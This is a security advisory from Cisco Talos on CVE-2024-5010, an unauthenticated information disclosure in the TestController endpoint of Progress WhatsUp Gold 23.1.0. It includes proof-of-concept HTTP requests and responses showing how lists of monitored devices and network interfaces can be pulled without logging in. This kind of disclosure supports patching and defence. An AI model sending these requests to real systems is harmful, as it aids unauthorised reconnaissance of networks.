Talos Vulnerability Report

TALOS-2024-1933

Progress Software Corporation WhatsUp Gold TestController multiple information disclosure vulnerabilities

June 26, 2024

CVE Number

CVE-2024-5010

SUMMARY

An information disclosure vulnerability exists in the TestController functionality of Progress Software Corporation WhatsUp Gold 23.1.0 Build 1697. A specially crafted HTTP request can lead to a disclosure of sensitive information. An attacker can make an unauthenticated HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Progress Software Corporation WhatsUp Gold 23.1.0 Build 1697

PRODUCT URLS

WhatsUp Gold - https://www.whatsupgold.com/

CVSSv3 SCORE

7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-200 - Information Exposure

DETAILS

WhatsUp Gold is a network monitoring and management software developed by Progress. WhatsUp Gold is designed to provide visibility into IT infrastructure, allowing organizations to monitor the performance and health of networks, devices, servers, applications, and other critical components. It offers features such as network mapping, performance monitoring, alerting, and reporting to help IT professionals ensure the optimal functioning of their network infrastructure.

The TestController endpoint is available to unauthenticated users and it discloses sensitive information through certain actions.

CVE-2024-5010 - Devices Information Disclosure

One of the TestController action sensitive informations disclosed do unauthenticated users is Devices. By sending the following request :

    REQ
GET /NmConsole/Wug/Test/Devices HTTP/1.1
Host: 192.168.0.252
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
    Referer: http://192.168.0.252/NmConsole/

An attacker can obtain a list of detected and monitored devices by WhatsUp Gold:

    RESP
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
Set-Cookie: ASP.NET_SessionId=vgfdfd4wiw4ab505tf11yl0z; path=/; HttpOnly; SameSite=Lax
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 08 Dec 2023 16:05:05 GMT
Connection: close
Content-Length: 488

[{"id":1,"name":"DESKTOP-XXXX","bestState":6,"worstState":6},{"id":2,"name":"192.168.0.26","bestState":6,"worstState":6},{"id":3,"name":"192.168.0.1","bestState":6,"worstState":6},{"id":4,"name":"192.168.0.2","bestState":6,"worstState":6},{"id":5,"name":"192.168.0.20","bestState":6,"worstState":6},{"id":6,"name":"192.168.0.55","bestState":6,"worstState":6},{"id":7,"name":"192.168.0.186","bestState":10,"worstState":10}]

Exposing such sensitive information to an attacker without proper authentication can be leveraged and exploited in further attacks.

CVE-2024-5010 - NetworkInterfaces Information Disclosure

Another of the TestController action sensitive informations disclosed do unauthenticated users is NetworkInterfaces. By sending the following request :

    REQ
GET /NmConsole/Wug/Test/NetworkInterfaces HTTP/1.1
Host: 192.168.0.252
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: application/json
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
    Referer: http://192.168.0.252/NmConsole/

An attacker can obtain a list of detected and monitored network interfaces by WhatsUp Gold:

RESP
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
Set-Cookie: ASP.NET_SessionId=l1azryxvh4my4gm3zh23ieu4; path=/; HttpOnly; SameSite=Lax
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 08 Dec 2023 16:11:50 GMT
Connection: close
Content-Length: 249

[{"id":1,"name":"192.168.0.26"},{"id":2,"name":"192.168.0.252"},{"id":3,"name":"192.168.0.1"},{"id":4,"name":"192.168.0.2"},{"id":5,"name":"192.168.0.20"},{"id":6,"name":"192.168.0.55"},{"id":7,"name":"192.168.0.186"},{"id":8,"name":"192.168.0.56"}]

Exposing such sensitive information to an attacker without proper authenticaton can be leveraged and exploited in further attacks.

TIMELINE

2024-02-07 - Initial Vendor Contact
2024-02-12 - Vendor Disclosure
2024-06-25 - Vendor Patch Release
2024-06-26 - Public Release

Credit

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

TALOS-2024-1932

TALOS-2024-1934

Intelligence Center

Vulnerability Research

Security Resources

Media

Company